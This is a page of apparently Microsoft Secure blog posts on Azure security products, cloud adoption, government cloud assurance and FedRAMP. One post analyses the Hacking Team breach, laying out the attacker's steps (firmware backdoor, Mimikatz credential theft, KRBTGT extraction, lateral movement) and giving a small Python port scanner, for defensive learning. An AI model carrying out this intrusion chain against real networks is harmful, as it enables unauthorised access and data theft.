These are just a few questions to get you thinking about recursive, adaptive cloud security. Stay on top of your security game by visiting resources on Microsoft Secure.

Categories: Cloud Computing, IoT, SaaS, security Tags:

Introducing the Microsoft Secure blog

For the past ten years on this blog we have shared Microsoft’s point of view on security, privacy, reliability, and trust. It has become the place to go for in-depth articles on Microsoft products and services, as well as tips and recommendations for improving security in your organization.

Last November, Microsoft CEO Satya Nadella outlined our new approach to cybersecurity — one that leverages Microsoft’s unique perspective on threat intelligence, informed by trillions of signals from billions of sources. This new approach integrates security into the platform and incorporates solutions from our partners. We invest more than $1 billion in R&D each year to advance our capabilities in all of these areas. The umbrella term we give those investments is Microsoft Secure.

With this fresh perspective, we’ve heard great feedback from our customers—and they’ve asked us to share more. So now is a great time to refresh the blog – with a new look and feel, and a new name: the Microsoft Secure Blog.

We will continue to share information about Microsoft products and services, as well as our perspective on industry trends, from an expanded roster of experts and about an even broader range of topics that we know our readers are interested in.

Categories: Cloud Computing, cybersecurity Tags:

New Microsoft Azure Security Capabilities Now Available

In November, Microsoft CEO Satya Nadella outlined a new comprehensive, cross company approach to security for our mobile-first, cloud-first world. To support this approach, Microsoft invests more than a billion dollars in security research and development, every year. Today we are announcing the general availability of key security capabilities in the Microsoft Cloud, which are products of this research and development investment: Azure Security Center, Azure Active Directory Identity Protection, and Azure Active Directory Privileged Identity Management.

These investments strengthen our efforts in three important areas:

  1. To deliver a holistic security platform where our products and services work in concert with each other, and with our partners in the security ecosystem, to protect our customers.
  2. To apply Microsoft’s unique insights into the threat landscape, informed by trillions of signals from billions of sources, to an intelligent security graph that informs how we protect all endpoints, better detect attacks, and accelerate our response.
  3. To ensure that when your organization leverages the Microsoft Cloud, it can improve your security posture versus what you can achieve protecting your on-premises IT environment alone.

Azure Security Center is generally available
We are announcing that Azure Security Center is generally available. Azure Security Center provides customers around the world with security management and monitoring capabilities for the millions of resources they run in Microsoft Azure, helping them keep pace with rapidly evolving threats in ways they likely could not achieve in their own datacenters.

Driven by Microsoft’s new approach to security, Azure Security Center is transforming how customers protect their cloud workloads. Powered by advanced analytics and a rich set of protection capabilities built into Azure, Security Center helps customers protect, detect, and respond to threats.

Since the preview launched in December 2015, Azure Security Center has helped protect over 100,000 Azure subscribers and hundreds of thousands of virtual machines – providing our customers with a unified view of the security state of all their cloud workloads, recommending ways to strengthen their security posture in accordance with their company policies, and using behavioral analysis and machine learning to detect threats.

In addition, Azure Security Center integrates with an ecosystem of partners like Barracuda.

“Microsoft is an important partner to Barracuda as we look to help customers improve security for their deployments in Azure. Azure Security Center is just one part of the compelling security agenda we have seen from Microsoft, and we believe the way it integrates Barracuda solutions will be a great benefit to our customers,” said Nicole Napiltonia, VP Strategic Alliances at Barracuda.

In addition to announcing general availability, Azure Security Center includes a number of new features today:

  • Integrated vulnerability assessment from partners like Qualys
  • Options for integrating Security Center recommendations and alerts with existing operations and security information event management (SIEM) solutions
  • Expanded support for Linux and Cloud Services VMs
  • New algorithms which detect lateral movement, internal reconnaissance, outgoing attacks, malicious scripts, and more
  • Alerts are now mapped against cyber kill chain patterns to provide customers with a single view of an attack campaign and all of the related alerts – so they can quickly understand what actions the attacker took and what resources were impacted
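
The kill-chain mapping in the last bullet can be pictured as grouping related alerts into a campaign and ordering them along the chain. The stage names below are illustrative, not Security Center’s actual taxonomy:

```python
# Illustrative kill-chain ordering, earliest stage first.
KILL_CHAIN = ["recon", "lateral_movement", "privilege_escalation", "exfiltration"]

def build_campaign_view(alerts):
    """Group alerts by suspected campaign and sort each group along the
    kill chain, producing one consolidated view per attack.
    alerts: list of dicts with 'campaign' and 'stage' keys."""
    by_campaign = {}
    for alert in alerts:
        by_campaign.setdefault(alert["campaign"], []).append(alert)
    for items in by_campaign.values():
        items.sort(key=lambda a: KILL_CHAIN.index(a["stage"]))
    return by_campaign
```

The value of this view is that an analyst sees the attacker’s progression in order, rather than a flat stream of unrelated alerts.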

You can get more details on new security capabilities for Azure customers from the blog post by Sarah Fender, Principal Program Manager, Azure Cybersecurity. The blog provides information on how to quickly get started with Azure Security Center to get better control and protection for your Azure resources.

Azure Active Directory Identity Protection
Another great example of a new Microsoft security investment is Azure Active Directory Identity Protection. Azure Active Directory security capabilities are built on Microsoft’s long experience protecting identities used to access Microsoft’s consumer and enterprise services, and gains tremendous accuracy by analyzing the signal from over 14 billion logins every day to help identify potentially compromised user accounts.

Azure Active Directory Identity Protection builds on these capabilities and detects suspicious activities for end users and privileged identities based on signals like brute force attacks, leaked credentials, logins from unfamiliar locations and infected devices. Based on these suspicious activities, a user risk severity is calculated and risk-based policies can be configured allowing the service to automatically protect the identities of your organization from future threats.
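
As a toy model of the risk-based policy idea, the sketch below folds detected signals into a severity bucket and maps that to an action. The weights and thresholds are invented for illustration; Identity Protection’s real scoring model is proprietary:

```python
# Hypothetical weights for the signals named above.
SIGNAL_WEIGHTS = {
    "leaked_credentials": 90,
    "brute_force": 60,
    "infected_device": 70,
    "unfamiliar_location": 40,
}

def user_risk(signals):
    """Reduce the detected signals to a severity bucket, driven by the
    strongest single signal in this simplified model."""
    score = max((SIGNAL_WEIGHTS.get(s, 0) for s in signals), default=0)
    if score >= 80:
        return "high"
    if score >= 50:
        return "medium"
    return "low" if score > 0 else "none"

def policy_action(severity):
    """A risk-based policy: block high-risk sign-ins, challenge medium
    ones with MFA, and let the rest through."""
    return {"high": "block", "medium": "require_mfa"}.get(severity, "allow")
```

The key idea is the separation of concerns: detections produce a risk level, and administrators configure what each level triggers.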

Azure Active Directory Identity Protection will become generally available later in the quarter. Enterprise customers should evaluate the preview of Azure Active Directory Identity Protection now, so that they are ready to use it when it becomes generally available.

Azure Active Directory Privileged Identity Management
Some of the threats that keep Chief Information Security Officers up at night include threats to privileged identities like administrator accounts. Some examples of these threats include:

  • Malicious or rogue administrators
  • Administrator credentials leaked via phishing attacks
  • Administrator credentials cached on compromised systems
  • User accounts that are granted temporary elevated privileges that become permanent.

More and more organizations are realizing that they have to strictly manage privileged accounts and monitor their activities because of the risk associated with their misuse. With Azure AD Privileged Identity Management you can manage, control, and monitor access to resources in Azure AD as well as other Microsoft online services like Office 365 or Microsoft Intune.

Azure Active Directory Privileged Identity Management will become generally available later in the quarter. I encourage you to evaluate the preview that became available in May so that you are ready to adopt this great new cloud security capability when it becomes generally available.

More good news is that we’ve made it super easy and cost effective for enterprise customers to get Azure Active Directory Identity Protection and Azure AD Privileged Identity Management by including them in the new Microsoft Enterprise Mobility + Security (EMS) E5 suite. You can get all the details, including all the other mobility and security related products and services included in EMS that were just announced, here. If your security strategy reaches more broadly to include Office 365, Windows 10 Enterprise, and EMS, consider the recently announced offering called Secure Productive Enterprise.

These key cloud security capabilities are a big step forward, and will help our customers protect, detect and respond to threats in a mobile-first, cloud-first world. To learn more about our security strategy and investments, visit the Microsoft Secure website.

Michal Braverman-Blumenstyk
General Manager, Azure Security

Categories: Cloud Computing Tags:

Connecting the dots to get ahead of your next security challenge

It is turbulent times we live in. The same technology that provides unprecedented global connections and productivity also provides hackers unprecedented surface area to commit headline-earning crimes. That’s why Microsoft is investing over $1 billion annually in security capabilities and connecting dots across the critical endpoints of today’s cloud and mobile world to help you keep up with security challenges.

Join Ann Johnson and me on June 29th at 10:00 am PST as we talk about the Top 5 security threats facing your business – and how to respond. You will discover our unique approach to security and how to benefit from the insight into the threat landscape that Microsoft derives from trillions of signals from billions of sources.

Change comes fast. It used to be that many organizations would lock down their networks and not even allow external web browsing from within their networks. Today, users need to be connected to people all over the world, using all kinds of social media tools, and other applications, most in the cloud. New devices are coming on the market that have the potential to boost productivity in ways we’ve never seen. To not allow these actions and tools would doom your organization to obscurity. But cybercriminals have become more sophisticated, too. How do you avoid a security breach while still allowing employees to stay ahead of the curve? We’ll cover this balance in our webinar.

Microsoft has taken an end to end look at these issues, and has solutions that cross products, technologies, and platforms.

On the front lines, your employees hold the key to your network’s security every time they log on or open an email. Windows 10, with Microsoft Passport and Windows Hello, and Azure Active Directory, which we will touch on in the webinar, help you go beyond passwords and put authentication in the tough-to-replicate physical world of the user’s machine and biometrics. And Office 365 can help identify and isolate malicious attachments and links in your users’ emails before they harm your network.

Devices too. Your company laptop used to be pretty bare-bones, right? Use it for work, and that’s it. You had your own toys to use for personal stuff, and as time wore on those devices became more and more indispensable to your daily life. People started to connect to email servers from their phones, and the lines started blurring from there. It can create a security nightmare for IT, especially since everyone has a different favorite platform. We created Microsoft Enterprise Mobility Suite to ensure secure interactions with your network no matter what the device or platform. We will also cover ensuring device security while enabling mobile work in our webinar.

And then there’s the cloud. So many questions about security, manageability, and control. Well, your employees aren’t waiting for you to figure it out; 80% of employees report using cloud apps that aren’t approved by IT. With Microsoft Cloud App Security, you can discover all the cloud apps in use on your network, and decide which ones to allow or block.

Say yes to rolling with the changes. Boost your organization’s productivity and rest assured that your network is protected because we have connected the dots in today’s cloud and mobile world.

Don’t miss out! Register today and join us on June 29, 2016 at 10:00 PST, for Top 5 security threats facing your business – and how to respond.

Julia White
General Manager, Cloud + Enterprise

Categories: Cloud Computing, cybersecurity Tags:

Dream Team for Moving to the Cloud

June 9th, 2016 No comments

The U.S. men’s basketball team’s defeat at the 1988 Summer Olympics (it placed only third, in a competition the U.S. should unquestionably have dominated) renewed calls to use professional athletes in the games. The following year it was agreed, and U.S. basketball asked the NBA to supply players for the upcoming 1992 games in Barcelona. The Dream Team was assembled. What followed was a phenomenon no one had anticipated. Of course the team swept the games and earned Olympic gold. The games, and the game of basketball, have never been the same.

What if your organization’s move to the cloud could be just as game-changing? To make it so, you need to assemble your own Dream Team for making the move. Who’s your Michael Jordan or Magic Johnson? Larry Bird? Or your Charles Barkley at the table for moving to the cloud?

Getting a team of the right players together from the onset, to discuss and debate the move all at the same time, can dramatically accelerate the discussion and get your business to the cloud sooner. I have talked to many, many customers over the years about adopting cloud services. Very often these conversations would uncover security blockers that were preventing enterprise customers from adopting the cloud. What I discovered after so many great meetings is exactly who needs to be on the Dream Team:

  • Your chief information security officer (CISO) or highest ranking security role in the organization. This person is responsible for defining the security policy, and signing off on the cloud security plan.
  • The chief information officer is the center on the team. This role helps balance the business realities with all the things the CISO and vice president of infrastructure might be concerned about, as well as ensuring legal sign off.
  • Chief privacy officer, or highest ranking privacy role. This person is responsible for your organization’s privacy policy. Privacy and security are typically two top-of-mind topics when organizations initially evaluate moving to the cloud, as well as two of the main principles of Microsoft’s Trusted Cloud.
  • Your organization’s general counsel, or highest ranking attorney. Because, let’s face it, very little is going to happen if legal doesn’t approve it. Attorneys who ultimately approve an organization’s cloud service contracts need to understand the roles and shared responsibilities between cloud service providers and their organization, as well as the risks that might be important to the organization.
  • If the IT infrastructure team is separate from any of the teams led by the aforementioned leaders, be sure to include their leader as well because they will likely be part of the deployment. If their questions aren’t addressed up front, early in the evaluation process, the organization might procure a cloud service, but deployment could face lengthy delays.
  • In regulated industries, the highest ranking compliance officer also needs to be included. Ensuring that your organization’s compliance obligations are met by the cloud service(s) you are planning to use typically isn’t optional. Bringing your compliance officer on your cloud evaluation journey will help accelerate the process.

Getting this team into a room together, likely more than once, gets key questions answered quickly. It will also help the evaluation process stay on course if one of the organization’s leaders should change roles or leave the organization.

Magic Johnson famously commented after the 1992 Olympics, “I look to my right, there’s Michael Jordan … I look to my left, there’s Charles Barkley or Larry Bird … I didn’t know who to throw the ball to!” Everyone on your Cloud Dream Team has a key stake in the move. Frankly, many at the table are wondering what the other thinks, so it is best to get it all out in the open. This will eliminate second-guessing and accelerate getting all the answers to key questions. The longer it takes to get the team using the same play book, the harder it will be to start winning.

One factor in conversations about trusting the cloud that often gets overlooked is innovation. Security, privacy and compliance are very important considerations when evaluating cloud services. But, for those organizations already using the cloud, the pace of innovation they see compared with their own datacenters is typically one of the biggest benefits they tell me about. Don’t underestimate the importance of innovation, around security for example, when evaluating cloud services. Check out the number of security-related offerings on Microsoft’s cloud platform road map at any given time and you might be pleasantly surprised. The younger, up-and-coming companies I have talked with aren’t encumbered by an on-premises IT legacy. If you are watching the up-and-comers in your industry and others, like Michael Jordan studied the game tapes of the competition in the 1992 Olympics, you’ll notice that they are not held back by an on-premises past. For them there is no question about the clear advantages of a mobile-first, cloud-first world. These young organizations are far ahead in this regard.

So who’s on your Dream Team? Start assembling them and preparing to take advantage of the benefits of the cloud. To learn more, visit our Trusted Cloud website.

Tim Rains
Director, Security

Categories: Cloud Computing Tags:

Microsoft publishes guide for secure and efficient integration of cloud services into government operations

June 1st, 2016 No comments

Estimates show that the global cloud computing market grew by 28 percent last year. Cloud is becoming an established technology for conducting and enabling business. Likewise, around the world, public sector cloud adoption is on the rise. The IDC predicts that public sector spending on cloud services will grow to $128 billion by 2018, more than doubling the amount spent in 2014. Governments are no longer determining if they’ll move to the cloud; they are focusing on when and how to integrate cloud services efficiently, effectively, and securely.

While cloud computing is undoubtedly a transformative technology, questions continue to arise about how to best embrace the power and agility of cloud services. Governments are working to determine what role they should play, how to best capitalize on cloud’s potential, and how to ensure that security and resilience requirements are met. Microsoft is committed to supporting governments on this journey and has developed Transforming Government: A cloud assurance program guide, which we are publishing today.

The guide has been designed to help governments as they develop and implement cloud assurance programs. Governments are no strangers to technology, and many have long-established information assurance and IT security programs. In fact, many established programs and practices can be re-used and adapted for a cloud environment. Governments also need to consider different aspects of the cloud experience, including efficiency, cost, and user experience, keeping in mind the all-important balance between security, performance, and innovation. Once there is alignment and a clear understanding of the intended outcomes, governments can begin to establish processes in support of them.

In three distinct phases, our cloud assurance program guide demonstrates the benefits that can be derived from adapting a holistic approach to IT risk management to this new technology revolution. In developing cloud assurance programs, governments may need to realign or create new authorities or processes to build trust between cloud service providers and government cloud users. From there, they should consider working in partnerships with cloud providers, the architects of cloud services, to evolve their risk management approaches in ways that are consistent with cloud operations.

A purposefully structured cloud assurance program—one with clearly outlined objectives tied to risk-based outcomes—can lay a foundation for government innovation. Cloud assurance programs are the portal to accessing a plethora of cloud services and apps with confidence in best-in-class security. However, unlike boxed-products programs (such as Common Criteria) in which certification can take years, the rate of cloud innovation means that cloud assurance programs must be calibrated to match the pace of technology upgrades while still meeting the established security bar.

A mature approach is marked by customer-defined security outcomes (what security objectives governments want to achieve) and CSP-determined security techniques (how to meet those outcomes). It reflects a progressive dialogue that requires collaboration across the cloud assurance stakeholder community. As governments work to continuously improve their cloud assurance programs to this desired end-state, this guide offers interim steps that governments can implement today.

Establishing a cloud assurance program is an investment – but one that pays significant dividends.

Categories: Cloud Computing Tags:

Hacking Team Breach: A Cyber Jurassic Park

Paleontology is the scientific study of the life of long-extinct animals. Paleontologists hypothesize about the behavior of the different species of dinosaurs, sometimes based on a few collected fossils and bones. We can only imagine how much more they were able to learn if they had a chance to observe some living herds of dinosaurs.

Incident Response (IR) is the cyber equivalent of paleontology. In most cases, IR experts are called in long after the breach occurred. They find themselves searching for tiny forensic cyber "bones" and then trying to glue them together to reconstruct the threat actor's activity in the victim's environment.

This is what makes the recently published report on the Hacking Team breach, written by the threat actor itself, so unique. It is a rare, publicly available, firsthand account of the attacker's side of a targeted attack. This report should therefore be analyzed thoroughly, as it offers an unparalleled learning opportunity for the security community.

Hacking Team Breach in a Nutshell

According to Hacking Team‘s own website the company’s mission is to “provide effective, easy-to-use offensive [cyber] technology to the worldwide law enforcement and intelligence communities.”

On July 5, 2015, the Hacking Team’s Twitter account was compromised to publish an announcement of a data breach against Hacking Team’s computer systems. The initial message read, “Since we have nothing to hide, we’re publishing all our e-mails, files, and source code …” and provided links to over 400 gigabytes of data, including alleged internal e-mails, invoices, and source code.

The breach had a severe negative impact on Hacking Team's business, as it exposed highly confidential information about Hacking Team's relationships with its customers, along with financial data and sensitive intellectual property, such as the zero-day vulnerabilities the company used to infect its customers' targets.

The Devil is in the details

The attackers’ report sheds light on their specific Tactics, Techniques and Procedures (TTPs):

  1. External network reconnaissance: The attacker discovered internet-facing network devices, including a vulnerable embedded network device.
  2. Internal network access: The attacker exploited a zero-day vulnerability in the embedded network device to update its firmware. The updated firmware included:
    1. A backdoor that enabled the attacker to access Hacking Team's internal network without needing to re-exploit the zero-day vulnerability each time.
    2. Various hacking tools, allowing the attacker to further attack the internal network. Most notably, a SOCKS proxy allowed the attacker to launch internal network attacks from tools hosted on a computer on the internet.
  3. Internal network reconnaissance: Using the NMAP scanner (one of the tools in the updated firmware), the attacker found a network-attached storage (NAS) server that allowed unauthenticated access to its contents.
  4. Compromised credentials: Through the SOCKS proxy, the attacker was able to remotely mount the disk of the Exchange email server that had been backed up to the NAS server. From the safety of an external machine, the attacker analyzed the disk with forensic tools and discovered the password of a domain user who was a local administrator on the Exchange server.
  5. Domain admin credentials compromised: With the compromised local administrator credentials, the attacker was able to log on to the Exchange server and download all emails. Using the Mimikatz tool, the attacker extracted additional credentials from the Exchange server's memory, including the domain admin credentials (depicted below).
    Figure 1 Compromised Credentials found on the Exchange Server
  6. Domain dominance: Using the domain admin credentials, the attacker extracted additional keys from the Active Directory (AD) server, including the powerful KRBTGT key, to gain persistence over the victim's domain. Additionally, the attacker abused the Group Policy central configuration mechanism, served from the AD server, to weaken a specific computer's firewall configuration.
  7. Lateral movement: With the omnipotent domain admin credentials, the attacker was able to remotely (via the SOCKS proxy) copy the hard disks of all machines.
    However, Hacking Team's source code resided on a segregated network. The attacker therefore needed to move to the computer of the network admin who had access to it. Using the WMI protocol (after disabling restrictive personal firewall settings with a rogue Group Policy update), the attacker gained access to that computer and, through it, to the source code.
  8. Exfiltration: The attacker sent the data out over the internet, as the network admin's machine was directly connected to it.
    Figure 2 Attackers Posted Screenshots on the Hacking Team's Hijacked Twitter Account, Depicting the Network Admin Desktop During Exfiltration
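The internal reconnaissance in step 3 boils down to simple TCP port probing against internal hosts. As an illustrative sketch only (the attacker's actual tooling was NMAP bundled into the firmware), a minimal scanner in Python might look like this; the host and ports shown are hypothetical stand-ins:

```python
import socket

def scan_ports(host: str, ports: list[int], timeout: float = 0.5) -> list[int]:
    """Return the subset of `ports` that accept a TCP connection on `host`."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            # connect_ex returns 0 when the TCP handshake succeeds,
            # i.e. when something is listening on that port.
            if sock.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

if __name__ == "__main__":
    # A NAS exposing SMB (445) or NFS (2049) without authentication is
    # exactly the kind of find that let the attacker reach the backups.
    print(scan_ports("127.0.0.1", [445, 2049]))
```

A real scanner like NMAP adds service fingerprinting and OS detection on top of this basic connect test, but the discovery principle is the same.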

Key Take-Aways

  • Assume breach: Once more we are reminded that defenders need to develop an "assume breach" mentality. Perimeter defenses will always fail against a dedicated attacker: every embedded device, server, application, endpoint, or user is an attack surface, and eventually one of them will have a vulnerability or be misconfigured.
    Therefore, companies must rebalance their security portfolios to put emphasis on internal network defense.
  • Attackers' modus operandi is to use compromised credentials: The attackers used compromised credentials to gain network persistence and move laterally from the initial infection point to their destination. Defenders therefore need to focus on protecting the identities of their users and other accounts (computers, services, etc.). Such protection can be applied by detecting anomalous usage of accounts and applying Multi-Factor Authentication (MFA).
  • Attackers' modus operandi is NOT to use malware: Throughout their report, the attackers emphasize that they refrain from leaving marks on disk. To do so, they:
    • Operate from the memory of rarely rebooted servers to achieve disk-less persistence.
    • Install the exploit on an embedded network device that cannot be scanned by traditional anti-malware solutions.
    • Use internal network proxies to keep their tools hosted on the internet, out of reach of anti-malware solutions, and tunnel their attack through the network.
  • Protecting the Identity Management (IDM) system is pivotal: By using compromised Domain Administrator credentials, the attackers accessed the victim's IDM system, Active Directory, to obtain additional keys, including the powerful KRBTGT key, and gain persistence over the victim's domain. With the same compromised credentials, the attackers abused the Group Policy central configuration mechanism, served from the AD server, to weaken a specific computer's configuration. Defenders must therefore not only maintain Active Directory hygiene through regular patching and hardening, but also monitor it. This is prudent guidance for any identity management system, not just Active Directory.
  • Cloud migration: Some of the attack avenues the attacker exploited could have been blocked with proper configuration and patching. However, migrating to a properly managed cloud-based service (SaaS) can relieve IT of such chores, reduce the organization's attack surface, and thus improve its security posture. It would have been much more difficult to access the backups and the server infrastructure, which would have helped prevent this breach.
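The "detect anomalous usage of accounts" guidance above can be sketched as a simple baseline comparison: flag any account that suddenly logs on to hosts it never touched during a baseline period, a crude signal of lateral movement with compromised credentials. This is a hypothetical illustration; the event format, field layout, and threshold are assumptions, not any product's API.

```python
from collections import defaultdict

def find_anomalous_accounts(events, baseline_days=30, max_new_hosts=3):
    """Flag accounts that log on to more than `max_new_hosts` hosts
    they never used during the baseline period.

    `events` is an iterable of (day, account, host) tuples; days below
    `baseline_days` form the baseline, later days are evaluated.
    """
    baseline = defaultdict(set)  # account -> hosts seen during baseline
    recent = defaultdict(set)    # account -> hosts seen afterwards
    for day, account, host in events:
        (baseline if day < baseline_days else recent)[account].add(host)
    return {
        account
        for account, hosts in recent.items()
        if len(hosts - baseline[account]) > max_new_hosts
    }
```

For example, an admin account that normally uses one workstation but suddenly touches an Exchange server, a domain controller, and several file servers in a single day would be flagged, while accounts with stable host usage would not. Production detection systems refine this with per-account statistical baselines and peer-group comparisons rather than a fixed threshold.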


Categories: Cloud Computing, cybersecurity Tags:

Estonia leading the way in driving digital continuity for government services

May 24th, 2016 No comments

We are at the threshold of unprecedented value creation for industry and society, driven by the accelerating pace of change enabled through digital technology. Whether it is about bringing together patient records so they can be shared quickly for better patient outcomes, or reimagining connectivity and predictive maintenance for cars to meet the expectations of road safety, digital transformation is changing how we work and live.

Called the Fourth Industrial Revolution, this significant disruption of traditional industries is fueled by speed, the falling cost of technology, and how quickly companies are growing. There is broad agreement that the economic opportunity from digital transformation could be as high as $100 trillion across all industries over the next decade. But this impact is broader than economics alone. For instance, governments must also consider the unique role they play in communities—literally holding the keys to the city, powering the grids, and administering the most critical public systems. And it's not just about implementing this or that technology to improve services, but about building digital resilience to minimize interruption. Estonia is a great example of a government reinventing its systems, and Microsoft is a proud partner.

Long considered a member of the public sector "Digital Masters," Estonia continuously demonstrates a transformative vision. From embracing incubation and innovation to trying out new ideas in a thoughtful, bold, and measured way, things tend to happen first in Estonia.

After exploring the broad concept of a digital “data embassy” (the focus of a joint Phase I research project), Estonia and Microsoft were interested in advancing strategic Information and Communications Technology (ICT) principles around “digital continuity.” In the face of natural or man-made interference, could cloud capabilities enhance digital resilience of government services? The Estonian Chief Information Officer and Microsoft set the course to find out.

In the process of this joint research project, we chose to evaluate the technical and policy aspects of “failing over” a critical government service in Microsoft Azure in the event of a disruption – part of a core element of meeting the needs of an advanced digital society and innovative government. Microsoft and the Estonian Ministry of Economic Affairs and Communications assessed the Estonia Land Register, the official digital record of land ownership in Estonia. Could the records be migrated to, and hosted on, the Microsoft Azure cloud computing platform? What technical and policy questions needed to be considered? Today, we published a video and our Proof of Concept findings in a Summary Report.

The Summary Report concludes with six recommendations for any government considering cloud computing. We continue to evaluate some of the harder questions about the operational requirements needed to support effective migration to, and build trust in, the public cloud.

Microsoft is delighted to participate in, learn from, and co-lead research projects such as this one, with the Estonia CIO and team. Public-private partnerships can advance digital transformation for governments, in turn, helping them better serve their citizens, empower their employees, optimize operations and transform their societies.

Categories: Cloud Computing, cybersecurity Tags:

Microsoft Trust Center adds new cloud services and certifications

The Microsoft Trust Center is expanding, and today we're adding more of our enterprise cloud services—Microsoft Commercial Support, Microsoft Dynamics AX, and Microsoft Power BI. These services join Microsoft Azure, Microsoft Dynamics CRM Online, Microsoft Intune, and Microsoft Office 365 in the Trust Center.

Additionally, we are adding two new compliance attestations, ENS in Spain and FACT in the UK. These two new certifications, added to those announced in March—CS Mark in Japan and MPAA— bring our total to 37—the most comprehensive of any major cloud service provider in the world.

We launched the Trust Center in November 2015 to create a central point of reference for cloud trust resources and to detail our commitments to security, privacy and control, compliance, and transparency. It is here that we document our adherence to international and regional compliance certifications and attestations, and lay out the policies and processes that Microsoft uses to protect your privacy and your data. Here, too, you’ll find descriptions of the security features and functionality in our services as well as the policies that govern the location and transfer of the data you entrust to us.

The new Microsoft compliance certifications and attestations include:

  • ENS. The Esquema Nacional de Seguridad (National Security Framework) in Spain provides ICT security guidance to public administrations and service providers. Microsoft was the first cloud service provider to receive the ENS certification—for Azure and Office 365.
  • FACT. The Federation Against Copyright Theft in the UK developed a certification scheme based on ISO 27001 that focuses on physical and digital security to protect against the theft of intellectual property. Azure was the first multitenant public cloud to achieve FACT certification.
  • MPAA. Azure was the first hyperscale cloud provider to comply with the Motion Picture Association of America guidance and control framework for the security of digital film assets.
  • CS Mark. The Cloud Security Mark is the first security standard for cloud service providers in Japan. Microsoft achieved a CS Gold Mark for all three service classifications: Azure for IaaS and PaaS, and Office 365 for SaaS.

The Trust Center website reflects the principles that underpin our products and services:

  • Security. Get an overview of how security is built into the Microsoft Cloud from the ground up, with protection at the physical, network, host, application, and data layers so that our online services are resilient to attack.
  • Privacy and control. Get visibility into our datacenter locations worldwide, data access policies, and data retention policies, backed with strong contractual commitments in the Microsoft Online Services Terms.
  • Compliance. Here you’ll find comprehensive information on Microsoft Cloud certifications and attestations such as EU Model Clauses, FedRAMP, HIPAA, ISO/IEC 27001 and 27018, PCI-DSS, and SOC 1 and SOC 2. Each compliance page provides background on the certification, a list of compliant services, and detailed information such as implementation guides and best practices.
  • Transparency. The Microsoft Cloud is built on the premise that for you to control your customer data in the cloud, you need to understand as much as possible about how that data is handled. You’ll find a summary of the policies and procedures here.

Visit the Microsoft Trust Center.

Categories: Cloud Computing Tags:

Microsoft Trusted Cloud Security Summit

April 13th, 2016 No comments

Earlier this month, Microsoft hosted its third Trusted Cloud Security Summit in Washington DC. The event brought together a wide range of security stakeholders from the different Microsoft cloud offerings and over 100 federal department and agency participants, particularly those looking to adopt the FedRAMP High baseline, such as the Department of Homeland Security, the Federal Bureau of Investigation, the Department of Justice, the State Department, the Treasury, and the Food and Drug Administration, among others. The interest in the event reflected the broader US government prioritization of cybersecurity, underlined by President Obama's announcement in February introducing the new Cybersecurity National Action Plan.

Ensuring the security of government agencies using cloud technologies follows a similar vein and has been central to the government since the introduction of the Cloud First policy in 2011. The Federal Risk and Authorization Management Program, better known as FedRAMP, was developed shortly thereafter and has for a number of years served as a process which provides a standardized, government-wide approach to security assessment, authorization, and continuous monitoring for cloud services. The original process supported migration of low and moderate impact workloads to the cloud and has helped many government agencies make that critical move. However, that has not been the case for some of the more critical services.

The FedRAMP High baseline aims to provide a higher categorization level for confidentiality, integrity and availability of cloud services; i.e. for those considered critical to government operations. While the High baseline addresses only 20% of government information and systems, it comprises over 50% of federal IT spend, reflecting a significant cost savings potential when migrating these workloads to the cloud. The pilot we participated in represented the last step in a year-long effort to develop the High baseline. The draft baseline has already been through two rounds of public comment and review from a Tiger Team from across multiple federal agencies.

Since FedRAMP was established, Microsoft has worked closely with the FedRAMP program management office to ensure our federal cloud solutions meet or exceed public sector security, privacy, and compliance standards. Our March Summit confirmed that this has not changed: Microsoft is one of only three cloud service providers included in the FedRAMP High baseline pilot, and is on track to achieve the corresponding authorization. Building on the FedRAMP authorization, Azure Government is also on track to achieve DISA Level 4 authorization shortly, covering unclassified data that requires protection against unauthorized disclosure and other mission-critical data (i.e., controlled unclassified data).

The event itself examined the development process of the FedRAMP High baseline, as well as its impact on federal cloud adoption. Matt Goodrich, Director for FedRAMP in GSA's Office of Citizen Services and Innovative Technologies (OCSIT), talked about how the revision of the process will benefit both providers and the government, for example by limiting certification time and providing more transparency, predictability, and risk focus upfront through a focus on core capabilities instead of an exclusively controls-centric approach.

The Summit also served to examine some of Microsoft's security capabilities that address other federal government cloud security priorities, including DOD's FedRAMP+ and DHS's Trusted Internet Connections programs. While both initiatives leverage the original FedRAMP process, they add unique requirements for providers to demonstrate additional levels of assurance and operational visibility, capabilities that Microsoft's cloud offerings can meet today.

For more on the security announcement made by Azure on the day, take a look at Matt Rathbun’s (Cloud Security Director, Azure) blog here.

Categories: Cloud Computing Tags: